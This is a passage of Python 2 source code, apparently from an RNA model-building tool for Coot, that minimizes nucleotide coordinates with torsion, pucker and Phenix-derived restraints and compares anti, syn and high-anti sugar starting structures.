None, None, startingRes, builtChain.nucs[1].resNum, #residue numbers
None, rots[1], #rotamers
None, builtChain.nucleotides[0].type, builtChain.nucleotides[1].type, #residue types
builtChain.nucleotides[0].atoms, #atomic coordinates
ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[0].atoms, builtChain.nucleotides[1].atoms) = newCoords
intermediateAtomLocs.append([builtChain.nucs[1].atoms["P"], builtChain.nucs[0].atoms["O3'"], builtChain.nucs[0].atoms["C3'"]])
minimizationScores.append(score)
startingResIndex += 1
rotsIndex = 2
#increment the progress bar
progressDialog.progress()
else:
rotsIndex = 1
fixPrevPhosOxy = True #don't minimize the first previous phosphoryl oxygens
#if we just built the first nucleotide, then minimizing them is going to take a long time and isn't going to make them
#any more accurate since there's no O3' to use to position them
#if we didn't just build the first nucleotide, then we don't want to adjust the non-bridging oxygens that are outside
#of our minimization range
for resIndex in xrange(startingResIndex, endingResIndex):
#minimize the structure
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule object
builtChain.nucs[resIndex-2].resNum if resIndex > 1 else None, builtChain.nucs[resIndex-1].resNum, builtChain.nucs[resIndex].resNum, builtChain.nucs[resIndex+1].resNum, #residue numbers
rots[rotsIndex-1], rots[rotsIndex], #rotamers
builtChain.nucs[resIndex-1].type, builtChain.nucs[resIndex].type, builtChain.nucs[resIndex+1].type, #residue types
builtChain.nucs[resIndex].atoms, #atomic coordinates
fixPrevPhosOxy = fixPrevPhosOxy, #if this is the first residue that we're rebuilding but not the first residue
#of the chain, then don't move the non-bridging oxygens of the previous residue
ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[resIndex-1].atoms, builtChain.nucleotides[resIndex].atoms, builtChain.nucleotides[resIndex+1].atoms) = newCoords
intermediateAtomLocs.append([builtChain.nucs[resIndex+1].atoms["P"], builtChain.nucs[resIndex].atoms["O3'"], builtChain.nucs[resIndex].atoms["C3'"]])
minimizationScores.append(score)
#increment the progress bar
progressDialog.progress()
rotsIndex += 1
firstRes = False
fixPrevPhosOxy = False #minimize all of the non-bridging oxygens from here on
resIndex = endingResIndex
#for the last rebuilt nucleotide, we have to call __minCoords with nextResAlreadyBuilt=True
#we don't need to worry about doing anything special if this is the last suite of the chain, though, since the 3' phosphoryl oxygens are already built
#only do this if we have a final 3' phosphate
#minimize the structure
if (resIndex + 1) < len(builtChain.nucs):
#print "*****Minimizing last nt*****"
#from time import sleep; sleep(3)
(newCoords, score) = __minCoords(pseudoMol, #pseudoMolecule obj
builtChain.nucs[resIndex-2].resNum if resIndex > 1 else None, builtChain.nucs[resIndex-1].resNum, builtChain.nucs[resIndex].resNum, builtChain.nucs[resIndex+1].resNum, #residue numbers
rots[rotsIndex-1], rots[rotsIndex], #rotamers
builtChain.nucs[resIndex-1].type, builtChain.nucs[resIndex].type, builtChain.nucs[resIndex+1].type, #residue types
builtChain.nucs[resIndex].atoms, #atomic coordinates
nextResAlreadyBuilt=True, fixPrevPhosOxy = fixPrevPhosOxy, ignoreDensity = ignoreDensity)
#update the builtChain object with the new coordinates
(builtChain.nucleotides[resIndex-1].atoms, builtChain.nucleotides[resIndex].atoms, builtChain.nucleotides[resIndex+1].atoms) = newCoords
minimizationScores.append(score)
#increment the progress bar (even though the user probably won't actually see this, since it will be replaced almost immediately by the review suites GUI))
progressDialog.progress()
#don't bother to do a separate minimization run for the phosphoryl oxygens of the final nucleotide. They should be good enough
finally:
__restoreCootSettings(origCootSettings) #restore the original Coot settings even if something went wrong during the minimization
progressDialog.restoreWindow() #never return from this function without running restoreWindow()
#GTK can crash Coot if it tries to update a GUI element that had been removed from the window and not restored (and possibly gone out of scope)
pseudoMol.drawExtraBonds() #redraw overly-long bonds for the entire molecule
return (intermediateAtomLocs, minimizationScores)
def __minCoords(pseudoMol, prevPrevResNum, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt = False, fixPrevPhosOxy = False, pucker = None, nextResAtoms = None, ignoreDensity = False):
"""Build a single nucleotide and minimize its coordinates.
ARGUMENTS:
pseudoMol - the pseudoMolecule object currently being used to display the chain
prevPrevResNum - the residue number of residue i-2
only used if we're using Phenix's pucker-specific restraints, in which case it's needed
to restrain the non-bridging oxygens of residue prevResNum
prevResNum - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0)
curResNum - the residue number to build using Coot numbering (i.e. starting at 1, not 0)
nextResNum - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0)
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
prevResType - the residue type (i.e. A, G, C, or U) of the previous residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
nextResType - the residue type (i.e. A, G, C, or U) of the next residue
curResAtoms - a hash of atom coordinates for the current residue
OPTIONAL ARGUMENTS:
nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
Defaults to False.
fixPrevPhosOxy - whether to fix the phosphoryl oxygens of the previous nucleotide during minimization
pucker - the sugar pucker for this nucleotide. Only necessary when both curRot
and nextRot are None (i.e. when we're building the only nucleotide of the chain)
Defaults to None
nextResAtoms - a hash of atoms containing coordinates for the next phosphate.
Should only be provided if we are building the only nucleotide of the chain
Defaults to None
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
newCoords - new atomic coordinates calculated by the minimization procedure, formatted as a list of dictionaries
score - the score received from Coot's minimization
"""
#print "*** Running __minCoords with:"
#print "*** prevResNum =", prevResNum, ",\tcurResNum =", curResNum, ",\tnextResNum =", nextResNum
#print "*** curRot =", curRot
#print "*** nextRot =", nextRot
#print "*** prevResType =", prevResType, "curResType =", curResType, "nextResType =", nextResType
#print "*** fixPrevPhosOxy =", fixPrevPhosOxy
#sleep(2)
chain = pseudoMol.chain
#initialize the refinement score variables so that we can easily print them later without worrying about them being undefined
antiRefinementScore = None
synRefinementScore = None
highAntiRefinementScore = None
selectedStartingStruc = None
#if we're not using Phenix restraints, then we don't need the i-2 residue number
if not USE_PHENIX_RESTRAINTS:
#By setting prevPrevResNum to None, that residue won't be included in the minimization
#(which is what we want if we're not using Phenix restraints)
prevPrevResNum = None
#build an anti sugar
if isinstance(curRot, str):
#if curRot is None or a list (indicating that we're manually setting torsions), then don't use it to determine the sugar pucker
curPucker = puckerList[curRot][1]
elif nextRot is not None:
curPucker = puckerList[nextRot][0]
else:
curPucker = pucker
initSugarCoords = sugarBuilder.buildSugar(curResAtoms, curPucker)
pseudoMol.addSugar(curResNum, initSugarCoords)
#if we're building the only nucleotide of the chain, then build the phosphates before minimization
if nextResAtoms is not None:
sugarAndP = dict(curResAtoms.items()+initSugarCoords.items())
phosOxyCoords5 = buildInitOrTerminalPhosOxy(sugarAndP)
pseudoMol.addPhosOxy(curResNum, phosOxyCoords5)
phosOxyCoords3 = buildInitOrTerminalPhosOxy(nextResAtoms, sugarAndP)
pseudoMol.addPhosOxy(nextResNum, phosOxyCoords3)
#store the structure of the previous and next nucleotides, so we can restore them if we restart minimization with a syn sugar
preMinimizationStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
#uncomment these lines to produce a Coot script for the minimization (i.e a script that will replicate the minimization we're about to do)
#if curResNum == 8:
# import sys
# if sys.modules.has_key("genMinimizationScript"): del sys.modules["genMinimizationScript"]
# from genMinimizationScript import genMinimizationScript
# genMinimizationScript("lastNucMin.py", pseudoMol, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt, fixPrevPhosOxy)
# raise Exception #don't actually run the minimization
#set the appropriate restraints
molNum = pseudoMol.molNum()
__fixAtoms(pseudoMol, prevResNum, curResNum, nextResNum, fixPrevPhosOxy)
__setTorsionRestraints(molNum, chain, prevResNum, curResNum, nextResNum, curRot, nextRot, curResType, nextResAlreadyBuilt)
if USE_PHENIX_RESTRAINTS:
__addPhenixRestraints(molNum, chain, prevPrevResNum, prevResNum, curResNum, nextResNum, curRot, nextRot, curResType, nextResAlreadyBuilt)
if prevPrevResNum is not None:
#when USE_PHENIX_RESTRAINTS is true, we remove the polymer-type from RNA nucleotides so that
#we can overwrite the link restraints (i.e. restraints spanning more than one nucleotide)
#as a side-effect of this, Coot no longer implicitely includes flanking nucleotides in the minimization
#as a result, the non-bridging oxygens of prevResNum will be improperly positioned unless we manually
#include the fully immobilized prevPrevResNum in the minimization
__fixEntireResidue(molNum, chain, prevPrevResNum, pseudoMol.getAtomNames(prevPrevResNum, strip=False))
#minimize the structure
antiRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
score = antiRefinementScore
selectedStartingStruc = "anti"
#check how good the results of the minimization are to decide if we should restart with a syn chi
if antiRefinementScore > SYN_REBUILDING_CUTOFF:
#if False:
#if the minimization did not end well, then we should restart it with a syn sugar
#first, store the results of this minimization
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
#antiRefinementStruc = pseudoMol.getCootNucs((resNum-1 or resNum) - 1, resNum)
antiRefinementStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
#restore the structure as it was before minimization
#pseudoMol.setCootNucs((resNum-1 or resNum) - 1, resNum, preMinimizationStruc, False)
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, preMinimizationStruc, False)
#Note: the False fourth argument skips running clear_and_update_molecule, since that will be run by
#replaceSugar() below
#calculate syn sugar coordinates
synSugarCoords = rotateSugar(initSugarCoords, curResAtoms, "syn")
pseudoMol.replaceSugar(curResNum, synSugarCoords)
#uncomment these lines to produce a Coot script for the minimization (i.e a script that will replicate the minimization we're about to do)
#if curResNum == 8:
# import sys
# if sys.modules.has_key("genMinimizationScript"): del sys.modules["genMinimizationScript"]
# from genMinimizationScript import genMinimizationScript
# genMinimizationScript("lastNucMin.py", pseudoMol, prevResNum, curResNum, nextResNum, curRot, nextRot, prevResType, curResType, nextResType, curResAtoms, nextResAlreadyBuilt, fixPrevPhosOxy)
# raise Exception
synRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
#if the syn refinement wasn't better than the anti refinement, then go back to the anti structure
if synRefinementScore >= antiRefinementScore:
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, antiRefinementStruc)
#we don't need to run pseudoMol.updateRes() here since it was run above
else:
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
score = synRefinementScore
selectedStartingStruc = "syn"
else:
#update the Pseudomolecule object so that it knows about the moved atoms
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
#try a high-anti structure if the best score is still too high
if score > HIGH_ANTI_REBUILDING_CUTOFF:
prevRefinementStruc = pseudoMol.getCootNucs(prevResNum or curResNum, nextResNum)
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, preMinimizationStruc, False)
highAntiSugarCoords = rotateSugar(initSugarCoords, curResAtoms, "high-anti")
pseudoMol.replaceSugar(curResNum, highAntiSugarCoords)
#raise Exception
highAntiRefinementScore = __runRefinement(molNum, chain, prevPrevResNum or prevResNum or curResNum, nextResNum, ignoreDensity)
if highAntiRefinementScore >= score:
pseudoMol.setCootNucs(prevResNum or curResNum, nextResNum, prevRefinementStruc)
else:
newCoords = pseudoMol.updateRes(prevResNum or curResNum, nextResNum)
score = highAntiRefinementScore
selectedStartingStruc = "high-anti"
#if desired, print a summary table listing the refinement scores and the selected structure
if PRINT_SUMMARY_TABLE:
print "********************************"
print "* Starting struc * Score *"
print "********************************"
print "* Anti * %s *" % __stringifyScore(antiRefinementScore)
print "* Syn * %s *" % __stringifyScore(synRefinementScore)
print "* High-anti * %s *" % __stringifyScore(highAntiRefinementScore)
print "********************************"
print "* Using %s minimization" % selectedStartingStruc + " " * (9-len(selectedStartingStruc)) + " *"
print "********************************"
#from time import sleep; sleep(2)
#pprint(newCoords)
#if we haven't already, build the non-bridging oxygens
if nextResAtoms is None:
curResIndex = pseudoMol.resIndex(curResNum)
#print "curResIndex =", curResIndex
#print "curResNum =", curResNum
#if curResIndex == 0:
if prevResNum is None:
#if this is the first (but not only) nucleotide
(newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords = buildInitOrTerminalPhosOxy(newCurResAtoms)
if phosOxyCoords is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords)
elif pseudoMol.numAtomsFromIndex(curResIndex+1) == 1 and not pseudoMol.connectedToNextFromIndex(curResIndex+1):
#if the next residue is just a terminal 3' phosphate, then we need to add non-bridging oxygens
(newPrevResAtoms, newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords5 = buildPhosOxy(newCurResAtoms, newPrevResAtoms)
if phosOxyCoords5 is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords5)
phosOxyCoords3 = buildInitOrTerminalPhosOxy(newNextResAtoms, newCurResAtoms)
if phosOxyCoords3 is not None:
pseudoMol.addPhosOxy(nextResNum, phosOxyCoords3)
else:
#if this is a middle nucleotide of a chain
#from pprint import pprint; pprint(newCoords)
(newPrevResAtoms, newCurResAtoms, newNextResAtoms) = newCoords
phosOxyCoords = buildPhosOxy(newCurResAtoms, newPrevResAtoms)
if phosOxyCoords is not None:
pseudoMol.addPhosOxy(curResNum, phosOxyCoords)
#clear the fixed atoms and torsional restraints
__clearResRestraints(molNum)
return (newCoords, score)
def __stringifyScore(score):
"""Format a refinement score for printing in the summary table
ARGUMENTS:
score - the refinement
RETURNS:
score formatted as a fixed length string or "Not run" if score is None
"""
if score == REFINEMENT_FAIL_SCORE:
return " Failed"
elif score is not None:
return "%7.3f" % score
else:
return "Not run"
def __fixAtoms(pseudoMol, prevResNumFull, curResNumFull, nextResNumFull, fixPrevPhosOxy):
"""Fix and restrain the appropriate atoms for minimization
ARGUMENTS:
pseudoMol - the PseudoMolecule object representing the molecule to fix atoms in
prevResNumFull - the residue number of the previous residue using Coot numbering (i.e. starting at 1, not 0) including insertion code
curResNumFull - the residue number using Coot numbering (i.e. starting at 1, not 0) including insertion code
nextResNumFull - the residue number of the next residue using Coot numbering (i.e. starting at 1, not 0) including insertion code
OPTIONAL ARGUMENTS:
fixPrevPhosOxy - whether to fix the phosphoryl oxygens of the previous nucleotide during minimization
Defaults to False
RETURNS:
None
"""
molNum = pseudoMol.molNum()
chain = pseudoMol.chain
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
#debugOut = open("fixAtoms.txt", "a")
#debugOut.write("Minimizing "+ ", ".join(map(str, [prevResNumFull, curResNumFull, nextResNumFull])) + "\n")
fixList = [] #the list of atoms to fix
#fix atoms from the previous residue
if prevResNum is not None:
#fix the previous non-bridging oxygens if this is the first minimization of a recalcSuites
if fixPrevPhosOxy:
prevResMobileAtoms = PREV_RES_MOBILE_ATOMS
else:
prevResMobileAtoms = PREV_RES_MOBILE_ATOMS.union(["OP1", "OP2"])
for curAtom in pseudoMol.getAtomNames(prevResNum, strip=False):
if curAtom.strip() not in prevResMobileAtoms:
fixList.append([chain, prevResNum, prevResInsCode, curAtom, ""])
#debugOut.write(",".join(map(str, [chain, prevResNum, prevResInsCode, curAtom, ""])) + "\n")
#restrain the starting and ending phosphates
add_extra_start_pos_restraint(molNum, chain, curResNum , curResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE)
add_extra_start_pos_restraint(molNum, chain, nextResNum, nextResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE)
#debugOut.write(",".join(map(str, [molNum, chain, curResNum , curResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE])) + "\n")
#debugOut.write(",".join(map(str, [molNum, chain, nextResNum, nextResInsCode, " P ", "", HARMONIC_STD_DEV_PHOSPHATE])) + "\n")
#restrain atoms from the current residue base + C1'
for curAtom in pseudoMol.getAtomNames(curResNum, strip=False):
if curAtom.strip() not in CUR_RES_MOBILE_ATOMS:
#fixList.append([chain, resNum, "", curAtom, ""])
add_extra_start_pos_restraint(molNum, chain, curResNum , curResInsCode, curAtom, "", HARMONIC_STD_DEV_BASE)
#debugOut.write(",".join(map(str, [molNum, chain, curResNum , curResInsCode, curAtom, "", HARMONIC_STD_DEV_BASE])) + "\n")
#fix atoms from the next residue
if nextResNum is not None:
for curAtom in pseudoMol.getAtomNames(nextResNum, strip=False):
if curAtom.strip() not in NEXT_RES_MOBILE_ATOMS:
fixList.append([chain, nextResNum, nextResInsCode, curAtom, ""])
#debugOut.write(",".join(map(str, [chain, nextResNum, nextResInsCode, curAtom, ""])) + "\n")
mark_multiple_atoms_as_fixed(molNum, fixList, 1)
#debugOut.close()
def __setTorsionRestraints(molNum, chain, prevResNumFull, curResNumFull, nextResNumFull, curRot, nextRot, curResType, nextResAlreadyBuilt = False):
"""Set the appropriate torsional restraints for the minimization
ARGUMENTS:
molNum - the Coot molecule number
chain - the chain name
prevResNumFull - the residue number of the previous residue including insertion codes
curResNumFull - the residue number to build including insertion codes
nextResNumFull - the residue number of the next residue including insertion codes
curRot - the rotamer to use when building the current residue
nextRot - the rotamer to use when building the next residue
curResType - the residue type (i.e. A, G, C, or U) of the current residue
OPTIONAL ARGUMENTS:
nextResAlreadyBuilt - should be True if the next residue is already built (i.e. if we are being
called from recalcCoords instead of calcCoords)
Defaults to False.
RETURNS:
None
"""
(prevResNum, prevResInsCode) = __splitResNum(prevResNumFull)
(curResNum, curResInsCode) = __splitResNum(curResNumFull)
(nextResNum, nextResInsCode) = __splitResNum(nextResNumFull)
if curRot is not None:
#print "Adding custom torsional restraints for residue", curResNum, "currot %s" % curRot
if isinstance(curRot, str):
prevDelta = rotData.prevDeltaMean(curRot)
ep = rotData.epMean (curRot)
zeta = rotData.zetaMean (curRot)
alpha = rotData.alphaMean(curRot)
beta = rotData.betaMean (curRot)
gamma = rotData.gammaMean(curRot)
prevDeltaSD = rotData.prevDeltaSD(curRot) * TORSION_STD_DEV_MOD
epSD = rotData.epSD(curRot) * TORSION_STD_DEV_MOD
zetaSD = rotData.zetaSD (curRot) * TORSION_STD_DEV_MOD
alphaSD = rotData.alphaSD(curRot) * TORSION_STD_DEV_MOD
betaSD = rotData.betaSD (curRot) * TORSION_STD_DEV_MOD
gammaSD = rotData.gammaSD(curRot) * TORSION_STD_DEV_MOD
else:
prevDelta = curRot[0]
ep = curRot[1]
zeta = curRot[2]
alpha = curRot[3]
beta = curRot[4]
gamma = curRot[5]
prevDeltaSD = MANUAL_TORSION_STD_DEV
epSD = MANUAL_TORSION_STD_DEV
zetaSD = MANUAL_TORSION_STD_DEV
alphaSD = MANUAL_TORSION_STD_DEV
betaSD = MANUAL_TORSION_STD_DEV
gammaSD = MANUAL_TORSION_STD_DEV
#previous delta
if prevDelta is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C5'", "",
chain, prevResNum, prevResInsCode, " C4'", "",
chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
prevDelta, prevDeltaSD, 1)
#epsilon
if ep is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C4'", "",
chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
chain, curResNum, curResInsCode, " P ", "",
ep, epSD, 1)
#zeta
if zeta is not None:
add_extra_torsion_restraint(molNum, chain, prevResNum, prevResInsCode, " C3'", "",
chain, prevResNum, prevResInsCode, " O3'", "",
chain, curResNum, prevResInsCode, " P ", "",
chain, curResNum, curResInsCode, " O5'", "",
zeta, zetaSD, 1)
#alpha
if alpha is not None:
add_extra_torsion_restraint(molNum, chain, curResNum, curResInsCode, " C5'", "",
chain, curResNum, curResInsCode, " O5'", "",
chain, curResNum, curResInsCode, " P ", "",
chain, prevResNum, prevResInsCode, " O3'", "",
alpha, alphaSD, 1)
#beta
if beta is not None:
add_extra_torsion_restraint(molNum, chain, curResNum, curResInsCode, " P ", "",
chain, curResNum, curResInsCode, " O5'", "",
chain, curResNum, curResInsCode, " C5'", "",
chain, curResNum, curResInsCode, " C4'", "",
beta, betaSD, 1)
#gamma
if gamma is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O5'", "",
chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
gamma, gammaSD, 1)
#add constraints on delta and the ring torsions
curPucker = None
delta = None
if isinstance(curRot, str):
curPucker = puckerList[curRot][1]
delta = rotData.curDeltaMean(curRot)
deltaSD = rotData.curDeltaSD(curRot)*TORSION_STD_DEV_MOD
elif isinstance(nextRot, str):
curPucker = puckerList[nextRot][0]
delta = rotData.prevDeltaMean(nextRot)
deltaSD = rotData.prevDeltaSD(nextRot)*TORSION_STD_DEV_MOD
if delta is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
delta, deltaSD, 1)
if curPucker is not None:
#print "adding ring constraints"
if curPucker == 2:
curNu0 = NU0_C2
curNu1 = NU1_C2
curNu4 = NU4_C2
else:
curNu0 = NU0_C3
curNu1 = NU1_C3
curNu4 = NU4_C3
#current nu0
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, " C2'", "",
curNu0, NU_STD_DEV, 1)
#current nu1
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, " C2'", "",
chain, curResNum , curResInsCode, " C3'", "",
curNu1, NU_STD_DEV, 1)
#current nu4
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C5'", "",
chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
curNu4, NU_STD_DEV, 1)
#print "adding chi restraint"
#redifine the chi restraints, since Coot uses a very strange default value
#(Note that even though the base is fixed, this chi restraint can affect the sugar positioning)
if curResType == "G" or curResType == "A":
baseAtom1 = " N9 "
baseAtom2 = " C4 "
else:
baseAtom1 = " N1 "
baseAtom2 = " C2 "
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " O4'", "",
chain, curResNum , curResInsCode, " C1'", "",
chain, curResNum , curResInsCode, baseAtom1, "",
chain, curResNum , curResInsCode, baseAtom2, "",
CHI_MEAN, CHI_STD_DEV, 2)
#Note that this torsion has a period of 2 (which means a period of 360/2=180 degrees) to account for anti and syn rotations
if nextRot is not None:
if isinstance(nextRot, str):
ep = rotData.epMean(nextRot)
epSD = rotData.epSD(nextRot) * TORSION_STD_DEV_MOD
if nextResAlreadyBuilt:
zeta = rotData.zetaMean(nextRot)
alpha = rotData.alphaMean(nextRot)
beta = rotData.betaMean(nextRot)
gamma = rotData.gammaMean(nextRot)
zetaSD = rotData.zetaSD(nextRot) * TORSION_STD_DEV_MOD
alphaSD = rotData.alphaSD(nextRot) * TORSION_STD_DEV_MOD
betaSD = rotData.betaSD(nextRot) * TORSION_STD_DEV_MOD
gammaSD = rotData.gammaSD(nextRot) * TORSION_STD_DEV_MOD
else:
ep = nextRot[1]
epSD = MANUAL_TORSION_STD_DEV
if nextResAlreadyBuilt:
zeta = nextRot[2]
alpha = nextRot[3]
beta = nextRot[4]
gamma = nextRot[5]
zetaSD = MANUAL_TORSION_STD_DEV
alphaSD = MANUAL_TORSION_STD_DEV
betaSD = MANUAL_TORSION_STD_DEV
gammaSD = MANUAL_TORSION_STD_DEV
#print "Adding custom torsional restraints for nextrot %s" % nextRot
if ep is not None:
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C4'", "",
chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
chain, nextResNum , nextResInsCode, " P ", "",
ep, epSD, 1)
if nextResAlreadyBuilt:
#if we're rebuilding a section and about to meet up with the existing structure, we need more constraints
#zeta
if zeta is not None:
#torsions can be None when we're rotamerizing and the last nucleotide is missing atoms
add_extra_torsion_restraint(molNum, chain, curResNum , curResInsCode, " C3'", "",
chain, curResNum , curResInsCode, " O3'", "",
chain, nextResNum, nextResInsCode, " P ", "",
chain, nextResNum, nextResInsCode, " O5'", "",
zeta, zetaSD, 1)
#alpha
if alpha is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " P ", "",
chain, curResNum , curResInsCode, " O3'", "",
alpha, alphaSD, 1)
#beta
if beta is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " P ", "",
chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " C4'", "",
beta, betaSD, 1)
#gamma
if gamma is not None:
add_extra_torsion_restraint(molNum, chain, nextResNum, nextResInsCode, " O5'", "",
chain, nextResNum, nextResInsCode, " C5'", "",
chain, nextResNum, nextResInsCode, " C4'", "",
chain, nextResNum, nextResInsCode, " C3'", "",
gamma, gammaSD, 1)
def __runRefinement(molNum, chain, startingResNumFull, endingResNumFull, ignoreDensity = False):
"""Run the minimization using Coot's built-in refinement functions
ARGUMENTS:
molNum - the Coot molecule number
chain - the chain name
startingResNumFull - the residue number (including insertion code) of the first nucleotide to refine
endingResNumFull - the residue number (including insertion code) of the last nucleotide to refine
OPTIONAL ARGUMENTS:
ignoreDensity - ignore the density when performing the minimization
defaults to False
RETURNS:
the refinement score
"""
print "*************************"
print "About to refine residues", startingResNumFull, "-", endingResNumFull
print "*************************"
(startingResNum, startingResInsCode) = __splitResNum(startingResNumFull)
(endingResNum, endingResInsCode) = __splitResNum(endingResNumFull)
#refine_zone and refine_zone_with_score don't support insertion codes, so for now the insertion codes gets ignored
#this will cause problems if trying to rotamerize a chain that uses insertion codes
if ignoreDensity:
refinementResults = regularize_zone_with_score(molNum, chain, startingResNum, endingResNum, "")
else:
#note that we need to use refine_zone_with_score, not refine_residues, since refine_residues assumes that things aren't bonded if they're more than three Angstroms apart
refinementResults = refine_zone_with_score(molNum, chain, startingResNum, endingResNum, "")
accept_regularizement()
return __calcRefinementScore(refinementResults)
def __clearResRestraints(molNum):
"""Clear the torsional restraints and fixed atoms that applied to the residues we were just minimizing
ARGUMENTS:
molNum - the Coot molecule number
RETURNS:
None
"""
clear_all_fixed_atoms(molNum)
delete_all_extra_restraints(molNum)
#a regex to separate a residue name and insertion code
__splitResNumRE = re.compile("(-?\d+)([A-Za-z]?)$")
def __splitResNum(resNumFull):
"""Split a residue number into number and insertion code
ARGUMENTS:
resNumFull - a residue number potentially contianing an insertion code
RETURNS:
resNum - the residue number without the insertion code (as an int)
insCode - the insertion code
"""
if resNumFull is None:
return (None, None)
else:
(resNum, insCode) = __splitResNumRE.match(str(resNumFull)).groups()
resNum = int(resNum) #the Coot SWIG functions require an integer argument, so we do explicit cast here
return (resNum, insCode)
def __changeMonomerRestraints():
"""Change the monomer restraints for RNA residues
ARGUMENTS:
None
RETURNS:
origRestraints - the original monomer restraints (so we can restore them later)
"""
origRestraints = {}
for curNuc in ("A", "G", "C", "U"):
origRestraints[curNuc] = monomer_restraints(curNuc)
newRestraints = monomer_restraints(curNuc) #we need a new copy of the dictionary so we don't modify the originalRestraints dict
#this next line is redundant with use_only_extra_torsion_restraints_for_torsions(1), but it certainly won't hurt anything
#use_only_extra_torsion_restraints_for_torsions(1) also has the advantage of turning off the link torsion restraints
#(i.e. restraints that span two nucleotides), but the link torsion restraints don't seem to be used during minimization
#regardless
newRestraints['_chem_comp_tor'] = []
#we don't need any of the existing restraints since we're rewriting all of the named restraints
#and the CONST restraints are redundant with the planar restraints (and seem to be ignored by Coot anyway)
#make the plane restraints tighter (change standard deviation from 0.020 to 0.001)
#since we really don't want non-planar bases (they can be a pain to fix later)
for curPlane in newRestraints['_chem_comp_plane_atom']:
curPlane[2] = 0.001
#if we're going to be using Phenix's restraints, then remove the default backbone bond and angle restraints
if USE_PHENIX_RESTRAINTS == True:
newRestraints['_chem_comp_angle'] = [curAngle for curAngle in newRestraints['_chem_comp_angle'] if not(curAngle[0].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curAngle[1].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curAngle[2].strip() in PHENIX_NEW_RESTRAINT_ATOMS)]
#add the Phenix restraints that aren't pucker specific
newRestraints['_chem_comp_angle'].extend([[" C2'", " C3'", " C4'", 102.6, 1.0],
[" C5'", " O5'", " P ", 120.9, 1.0],
[" O5'", " P ", " OP1", 110.7, 1.000],
[" OP1", " P ", " OP2", 119.6, 1.000],
[" O5'", " P ", " OP2", 110.7, 1.000]])
newRestraints['_chem_comp_bond'] = [curBond for curBond in newRestraints['_chem_comp_bond'] if not (curBond[0].strip() in PHENIX_NEW_RESTRAINT_ATOMS and curBond[1].strip() in PHENIX_NEW_RESTRAINT_ATOMS)]
#add in the bond restraints that aren't pucker specific
newRestraints['_chem_comp_bond'].extend([[" P ", " O5'", 'single', 1.593, 0.015],
[" P ", " OP1", 'deloc', 1.485, 0.020],
[" P ", " OP2", 'deloc', 1.485, 0.020]])
#remove the polymer type so that we can replace the link restraints (restraints that span two nucleotides)
#there's no way to set proper link restraints, so all link restraints are set as extra restraints in phenixRestraints.py
newRestraints['_chem_comp'][3] = "" #previously, this value was "RNA"
